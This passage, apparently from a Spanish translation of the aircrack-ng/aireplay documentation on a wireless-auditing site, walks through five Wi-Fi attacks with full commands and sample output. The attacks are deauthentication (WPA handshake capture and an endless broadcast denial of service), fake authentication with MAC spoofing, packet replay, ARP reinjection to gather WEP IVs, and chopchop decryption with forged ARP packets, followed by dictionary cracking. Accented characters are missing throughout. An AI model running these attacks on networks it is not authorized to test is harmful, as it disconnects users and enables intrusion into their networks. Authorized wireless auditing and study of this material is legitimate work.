Esto normalmente ocurre cuando las cabeceras no coinciden con el kernel que ests usando. En esta situacin simplemente recompila un kernel nuevo, instlalo y reinicia. Luego, prueba otra vez a compilar el controlador. Ver este HOWTO para ms detalles sobre cmo compilar el kernel. Cmo uso aireplay ? Si el controlador est correctamente parcheado, aireplay es capaz de inyectar paquetes 802.11 en modo Monitor en bruto; actualmente implementa un conjunto de 5 ataques diferentes. Si recibes el mensaje " ", revisa que el nombre de tu dispositivo es correcto y que no has olvidado un parmetro en la lnea de comandos. En los siguientes ejemplos, 00:13:10:30:24:9C es la direccin MAC del punto de acceso (en el canal 6), y 00:09:5B:EB:C5:2B es la direccin MAC de un cliente inalmbrico. Ataque 0: desautenticacin Este ataque es probablemente el ms til para recuperar un ESSID oculto (no difundido) y para capturar "saludos" WPA forzando a los clientes a reautentificarse. Tambin puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacan su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados. Normalmente es ms efectivo fijar como blanco una estacin especfica usando el parmetro -c. Algunos ejemplos: Captura del "saludo" WPA una Atheros airmon.sh start ath0 airodump ath0 out 6 (cambia a otra consola) aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0 (espera unos segundos) aircrack -w /ruta/al/diccionario out.cap Generar peticiones ARP con una tarjeta Prism2 airmon.sh start wlan0 airodump wlan0 out 6 (cambia a otra consola) aireplay -0 10 -a 00:13:10:30:24:9C wlan0 aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0 Despus de enviar tres tandas de paquetes de desautentificacin, comenzamos a escuchar en busca de peticiones ARP con el ataque 3. La opcin -h es esencial y debe ser la direccin MAC de un cliente asociado. Si el controlador es wlan-ng, debes ejecutar el script airmon.sh; de otro modo la tarjeta no estar preparada correctamente para la inyeccin.

Denegacin de servicio masiva con una tarjeta RT2500 airmon.sh start ra0 aireplay -0 0 -a 00:13:10:30:24:9C ra0 Con el parmetro 0, este ataque enviar en un bucle infinito paquetes de desautentificacin a las direcciones de broadcast, evitando as que los clientes permanezcan conectados.

Ataque 1: autenticacin falsa Este ataque es particularmente til cuando no hay clientes asociados: creamos la direccin MAC de un cliente falso, la cual quedar registrada en la tabla de asociacin del AP. Esta direccin ser usada para los ataques 3 (reinyeccin de peticiones ARP) y 4 (desencriptacin WEP "chopchop"). Es mejor preparar la tarjeta con la MAC usada (abajo, 00:11:22:33:44:55) de modo que el controlador enve ACKs de forma adecuada. De todos modos si este ataque falla y hay ya un cliente asociado, es ms efectivo usar simplemente su direccin MAC (aqu, 00:09:5B:EB:C5:2B) para los ataques 3 y 4. ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up aireplay -1 0 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-)

Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en s misma no importa, en tanto que el AP acepte autenticacin abierta). Por lo que, en lugar de usar el ataque 1, puedes slo asociarte e inyectar / monitorizar a travs de la interfaz athXraw: ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid "el ssid" key AAAAAAAAAA ifconfig ath0 up sysctl -w dev.ath0.rawdev=1 ifconfig ath0raw up airodump ath0raw out 6

9 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazar automticamente ath0 por ath0raw): aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0 aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

Algunos puntos de acceso requieren de reautentificacin cada 30 segundos, si no nuestro cliente falso ser considerado desconectado. En este caso utiliza el retardo de re-asociacin peridica: aireplay -1 30 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Si este ataque parece fallar (aireplay permanece enviando paquetes de peticin de autenticacin), puede que est siendo usado un filtrado de direcciones MAC. Asegrate tambin de que: Ests lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque tambin puede fallar. El controlador est correctamente parcheado e instalado. La tarjeta est configurada en el mismo canal que el AP. El BSSID y el ESSID (opciones -a / -e) son correctos. Si se trata de Prism2, asegrate de que el firmware est actualizado. Como recordatorio: no puedes inyectar con un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido a limitaciones de firmware y/o controlador. Pero se han solucionado con la nueva suite para las centrino ipw2200b/g.

Ataque 2: Reenvo interactivo de paquetes Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados ms efectivos que el ataque 3 (reinyeccin automtica de ARP). Podras usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cul slo funciona si el AP realmente reencripta los paquetes de datos WEP: aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \ -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0 Tambin puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamao es bien 68 o 86 bytes (dependiendo del sistema operativo): aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \ -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0 aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \ -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0 Ataque 3: Reinyeccin de peticin ARP El clsico ataque de reinyeccin de peticin ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la direccin MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso ms, hasta que aparezca una peticin ARP; este ataque fallar si no hay trfico. Por favor, fjate en que tambin puedes reutilizar una peticin ARP de una captura anterior usando el interruptor -r . aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. Read 2493 packets (got 1 ARP requests), sent 1305 packets... Ataque 4: El "chopchop" de KoreK (prediccin de CRC) Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinmica. Este ataque no recupera la clave WEP en s misma, sino que revela meramente el texto plano. De cualquier modo, la mayora de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.

1. Primero, desencriptemos un paquete: aireplay -4 -h 00:09:5B:EB:C5:2B ath0 2. Echemos un vistazo a la direccin IP: tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1 3. Ahora, forjemos una peticin ARP. La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La direccin MAC inicial debe corresponder a una estacin asociada. ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \ 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap 4. Y reenviemos nuestra peticin ARP forjada:

10 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

aireplay -2 -r arp.cap ath0

Finalmente, me gustara agradecer a la mucha, mucha gente que han contribuido con aircrack... vosotros sabis quines sois :-)

Publicidad

Productos especificos auditoria wireless

Hwagm - hwagm.elhacker.net

11 de 11

27/06/2009 11:03